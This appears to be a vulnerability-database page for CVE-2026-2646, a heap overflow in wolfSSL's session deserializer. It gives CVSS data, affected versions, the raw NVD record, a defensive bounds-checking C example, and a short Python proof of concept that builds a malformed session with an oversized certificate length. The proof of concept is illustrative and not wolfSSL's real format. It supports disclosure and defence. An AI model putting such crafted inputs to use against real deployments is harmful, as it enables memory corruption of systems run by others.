Security Vulnerability Report
CVE-2026-2646 CVSS 8.1 HIGH

CVE-2026-2646

Published: 2026-03-19 18:16:22
Last Modified: 2026-04-29 18:42:48

Description

A heap-buffer-overflow vulnerability exists in wolfSSL's wolfSSL_d2i_SSL_SESSION() function. When deserializing session data with SESSION_CERTS enabled, certificate and session id lengths are read from an untrusted input without bounds validation, allowing an attacker to overflow fixed-size buffers and corrupt heap memory. A maliciously crafted session would need to be loaded from an external source to trigger this vulnerability. Internal sessions were not vulnerable.
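The defect the description names is a length field taken from untrusted input and used to copy into a fixed-size buffer without first checking it. The following C program is an added example, not wolfSSL's code or the patched wolfSSL_d2i_SSL_SESSION(): it deserializes an assumed, simplified session layout (a session id and a list of certificates, each length-prefixed) and shows the two checks a safe deserializer performs before every copy, the claimed length against the destination capacity and against the bytes still left in the input. The buffer sizes, the wire layout and the sample inputs are all constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Capacities of the fixed-size destination buffers. These sizes and the
 * wire layout below are assumptions for this example, not wolfSSL's
 * serialized-session format. */
#define MAX_SESSION_ID_LEN 32
#define MAX_CERT_LEN       4096
#define MAX_CERTS          4

typedef struct {
    uint8_t  session_id[MAX_SESSION_ID_LEN];
    uint8_t  session_id_len;
    uint8_t  certs[MAX_CERTS][MAX_CERT_LEN];
    uint32_t cert_len[MAX_CERTS];
    uint8_t  cert_count;
} session_t;

typedef enum {
    PARSE_OK            =  0,
    PARSE_ERR_TRUNCATED = -1,  /* length field claims more bytes than the input holds */
    PARSE_ERR_TOO_LONG  = -2,  /* length field exceeds the destination buffer */
    PARSE_ERR_COUNT     = -3   /* more certificates than the struct can store */
} parse_result;

/* Cursor over untrusted input: every read is checked against the bytes left. */
typedef struct { const uint8_t *p; size_t remaining; } cursor_t;

static int read_u8(cursor_t *c, uint8_t *out)
{
    if (c->remaining < 1) return 0;
    *out = *c->p++; c->remaining--;
    return 1;
}

static int read_u32be(cursor_t *c, uint32_t *out)
{
    if (c->remaining < 4) return 0;
    *out = ((uint32_t)c->p[0] << 24) | ((uint32_t)c->p[1] << 16) |
           ((uint32_t)c->p[2] << 8)  |  (uint32_t)c->p[3];
    c->p += 4; c->remaining -= 4;
    return 1;
}

/* The check the CVE description says was missing: `len` must fit both the
 * destination capacity and the remaining input before any copy happens. */
static parse_result read_bytes(cursor_t *c, uint8_t *dst, size_t cap, size_t len)
{
    if (len > cap)          return PARSE_ERR_TOO_LONG;
    if (len > c->remaining) return PARSE_ERR_TRUNCATED;
    memcpy(dst, c->p, len);
    c->p += len; c->remaining -= len;
    return PARSE_OK;
}

/* Assumed wire layout: [id_len:1][id][cert_count:1]{[cert_len:4 BE][cert]}* */
parse_result session_deserialize(const uint8_t *buf, size_t buf_len, session_t *out)
{
    cursor_t c = { buf, buf_len };
    parse_result r;
    uint8_t id_len, count;

    memset(out, 0, sizeof(*out));
    if (!read_u8(&c, &id_len)) return PARSE_ERR_TRUNCATED;
    if ((r = read_bytes(&c, out->session_id, MAX_SESSION_ID_LEN, id_len)) != PARSE_OK) return r;
    out->session_id_len = id_len;

    if (!read_u8(&c, &count)) return PARSE_ERR_TRUNCATED;
    if (count > MAX_CERTS) return PARSE_ERR_COUNT;
    for (uint8_t i = 0; i < count; i++) {
        uint32_t clen;
        if (!read_u32be(&c, &clen)) return PARSE_ERR_TRUNCATED;
        if ((r = read_bytes(&c, out->certs[i], MAX_CERT_LEN, clen)) != PARSE_OK) return r;
        out->cert_len[i] = clen;
    }
    out->cert_count = count;
    return PARSE_OK;
}

/* Constructed sample inputs (not captured from any real session). */
static const uint8_t SAMPLE_VALID[] = {            /* 4-byte id, one 3-byte cert */
    0x04, 'a', 'b', 'c', 'd', 0x01, 0x00, 0x00, 0x00, 0x03, 'x', 'y', 'z' };
static const uint8_t SAMPLE_OVERSIZED[] = {        /* cert length claims 0xFFFFFFFF */
    0x04, 'a', 'b', 'c', 'd', 0x01, 0xFF, 0xFF, 0xFF, 0xFF, 'A', 'A', 'A', 'A' };
static const uint8_t SAMPLE_TRUNCATED[] = {        /* cert length 16, only 3 bytes present */
    0x04, 'a', 'b', 'c', 'd', 0x01, 0x00, 0x00, 0x00, 0x10, 'x', 'y', 'z' };

parse_result demo_valid(void)     { session_t s; return session_deserialize(SAMPLE_VALID, sizeof SAMPLE_VALID, &s); }
parse_result demo_oversized(void) { session_t s; return session_deserialize(SAMPLE_OVERSIZED, sizeof SAMPLE_OVERSIZED, &s); }
parse_result demo_truncated(void) { session_t s; return session_deserialize(SAMPLE_TRUNCATED, sizeof SAMPLE_TRUNCATED, &s); }

/* 1 when the valid sample parses and every field carries the expected value. */
int demo_valid_fields(void)
{
    session_t s;
    if (session_deserialize(SAMPLE_VALID, sizeof SAMPLE_VALID, &s) != PARSE_OK) return 0;
    return s.session_id_len == 4 && s.cert_count == 1 && s.cert_len[0] == 3
        && memcmp(s.certs[0], "xyz", 3) == 0;
}

int main(void)
{
    printf("valid=%d oversized=%d truncated=%d\n", demo_valid(), demo_oversized(), demo_truncated());
    return 0;
}
```

The oversized sample carries the same 0xFFFFFFFF length the PoC below packs; with the two checks in read_bytes it is rejected before memcpy runs, instead of being used as a copy size. Doing the capacity check and the remaining-input check separately also gives distinct error codes, which is useful when fuzzing or logging rejected sessions.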

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector (v3.1, primary): CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Secondary CVSS 4.0 metric (from the raw record): 5.0 MEDIUM, CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:P; note that this secondary rating treats the attack vector as local, consistent with the requirement that a crafted session be loaded from an external source.
Weaknesses: CWE-122 (heap-based buffer overflow), CWE-787 (out-of-bounds write)

Configurations (Affected Products)

cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:* - VULNERABLE (versions before 5.9.0, per the NVD configuration)
wolfSSL (for the exact affected versions, see GitHub PRs #9748 and #9949)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# This is a conceptual PoC to demonstrate the vulnerability trigger.
# It crafts a malicious SSL session structure with an oversized certificate length.
# Note: the 2-byte header and the field layout below are illustrative only and
# do not reproduce wolfSSL's actual serialized session format.
def create_malformed_session():
    header = b'\x00\x00'  # Dummy header
    # Set an arbitrarily large length for the certificate to trigger overflow.
    # Normally this would be a reasonable size, but here we use 0xFFFFFFFF.
    malicious_cert_len = struct.pack('>I', 0xFFFFFFFF)
    # Construct the payload
    # Structure: [Header][Malicious Cert Length][Dummy Data...]
    payload = header + malicious_cert_len + b'A' * 100
    print("Generated malformed session payload.")
    print(f"Payload hex: {payload.hex()}")
    return payload


if __name__ == "__main__":
    create_malformed_session()

References

https://github.com/wolfSSL/wolfssl/pull/9748 (Issue Tracking, Patch)
https://github.com/wolfSSL/wolfssl/pull/9949 (Issue Tracking, Patch)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-2646",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-19T18:16:22.223",
    "lastModified": "2026-04-29T18:42:47.640",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A heap-buffer-overflow vulnerability exists in wolfSSL's wolfSSL_d2i_SSL_SESSION() function. When deserializing session data with SESSION_CERTS enabled, certificate and session id lengths are read from an untrusted input without bounds validation, allowing an attacker to overflow fixed-size buffers and corrupt heap memory. A maliciously crafted session would need to be loaded from an external source to trigger this vulnerability. Internal sessions were not vulnerable."
      },
      {
        "lang": "es",
        "value": "Una vulnerabilidad de desbordamiento de búfer de montón existe en la función wolfSSL_d2i_SSL_SESSION() de wolfSSL. Al deserializar datos de sesión con SESSION_CERTS habilitado, las longitudes del certificado y del ID de sesión se leen de una entrada no confiable sin validación de límites, permitiendo a un atacante desbordar búferes de tamaño fijo y corromper la memoria del montón. Una sesión creada maliciosamente necesitaría ser cargada desde una fuente externa para activar esta vulnerabilidad. Las sesiones internas no eran vulnerables."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "attackRequirements": "PRESENT",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-122"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-787"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "5.9.0",
                "matchCriteriaId": "DA3FA1CB-CEDC-4D49-9ECD-99BBF1602312"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/wolfSSL/wolfssl/pull/9748",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://github.com/wolfSSL/wolfssl/pull/9949",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      }
    ]
  }
}